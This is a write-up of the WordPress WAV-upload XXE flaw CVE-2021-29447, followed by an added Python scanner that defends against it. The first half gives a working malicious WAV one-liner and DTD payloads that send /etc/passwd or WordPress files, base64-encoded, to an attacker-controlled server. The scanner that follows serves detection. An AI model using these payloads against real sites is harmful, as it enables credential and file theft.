CVE-2021-29447

Impact

Arbitrary File Disclosure: the content of any file on the host's file system could be retrieved, e.g. wp-config.php, which contains sensitive data such as database credentials.

Server-Side Request Forgery (SSRF): HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact.

Exploiting the vulnerability

A WordPress site affected by this vulnerability was identified during enumeration with the wpscan tool.


Creating a malicious WAV file.

It's very easy; in your bash console:

# RIFF header (0xb8 = byte count after this size field), WAVE form type, then an iXML chunk
# (0x7b = byte count of the XML payload, including the trailing NUL); both sizes must match what is written
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSERVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

On your attacker machine, create the DTD file (NAMEEVIL.dtd) that the vulnerable web server will fetch and evaluate:

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

Note: to read WordPress files, use the syntax "../WP-FILE.php", e.g.:

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../index.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

Serve the directory containing the DTD file with a Python HTTP server (python3 -m http.server 8081).
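As an added example (not part of the original write-up or of the referenced PoC repository), here is a Python check a defender can run over a wp-content/uploads directory or hook into an upload pipeline: it walks the RIFF chunks of a WAV file and flags an iXML chunk that carries a DOCTYPE with external (SYSTEM/PUBLIC) or parameter entities, which is exactly the structure the payload above relies on. The two sample files and the placeholder.invalid hostname are constructed for the demonstration and are not from the page.

```python
"""Flag WAV files whose iXML chunk carries a DTD with external entities
(the structure abused by CVE-2021-29447). Added example, not the page's code."""
import re
import struct
from typing import Iterator, List, Tuple

# Indicators of a DTD that a vulnerable ID3/XML parser would resolve:
# a DOCTYPE, an external entity declaration, and parameter-entity references.
_DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
_EXTERNAL_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(?:%|&#x25;|&#37;)?\s*\w+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE
)
_PARAM_ENTITY_REF_RE = re.compile(rb"%\w+;")


def iter_riff_chunks(data: bytes) -> Iterator[Tuple[bytes, bytes]]:
    """Yield (chunk_id, payload) for each chunk of a RIFF/WAVE container.

    A declared chunk size larger than the remaining bytes yields whatever is
    actually present, so a crafted size field cannot hide the chunk from us.
    """
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        chunk_id = data[pos:pos + 4]
        (size,) = struct.unpack("<I", data[pos + 4:pos + 8])
        yield chunk_id, data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)  # chunks are word-aligned: pad byte after odd sizes


def scan_wav(data: bytes) -> List[str]:
    """Return the findings for one WAV file; an empty list means no XXE indicators."""
    findings = []
    for chunk_id, payload in iter_riff_chunks(data):
        if chunk_id != b"iXML":
            continue
        if _DOCTYPE_RE.search(payload):
            findings.append("iXML chunk contains a DOCTYPE declaration")
        if _EXTERNAL_ENTITY_RE.search(payload):
            findings.append("iXML chunk declares an external (SYSTEM/PUBLIC) entity")
        if _PARAM_ENTITY_REF_RE.search(payload):
            findings.append("iXML chunk references parameter entities")
    return findings


def build_wav(chunks: List[Tuple[bytes, bytes]]) -> bytes:
    """Assemble a minimal RIFF/WAVE file from (id, payload) pairs (used for the samples below)."""
    body = b"WAVE"
    for chunk_id, payload in chunks:
        body += chunk_id + struct.pack("<I", len(payload)) + payload
        if len(payload) & 1:
            body += b"\x00"
    return b"RIFF" + struct.pack("<I", len(body)) + body


# Constructed samples: a benign file with an ordinary iXML metadata chunk, and one
# whose iXML chunk pulls in an external DTD (placeholder.invalid is a placeholder host).
BENIGN_WAV = build_wav([
    (b"fmt ", struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)),
    (b"iXML", b'<?xml version="1.0"?><BWFXML><PROJECT>demo</PROJECT></BWFXML>'),
    (b"data", b"\x00\x00" * 4),
])
SUSPICIOUS_WAV = build_wav([
    (b"iXML", b'<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '
              b"'http://placeholder.invalid/evil.dtd'>%remote;]>\x00"),
])

if __name__ == "__main__":
    import sys
    # Usage: python scan_wav.py file1.wav file2.wav ...
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            hits = scan_wav(fh.read())
        print(path, "SUSPICIOUS" if hits else "clean", *hits, sep="\n  ")
```

The checks are deliberately byte-level rather than a full XML parse: the point is to refuse or quarantine the file before any XML library touches it, since it is the act of parsing the DTD that triggers the entity resolution. Pairing this with outbound-connection monitoring from the web tier (a PHP worker fetching a .dtd from an unknown host is a strong signal) covers the SSRF side of the issue as well.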

Ref:

https://github.com/motikan2010/CVE-2021-29447
https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5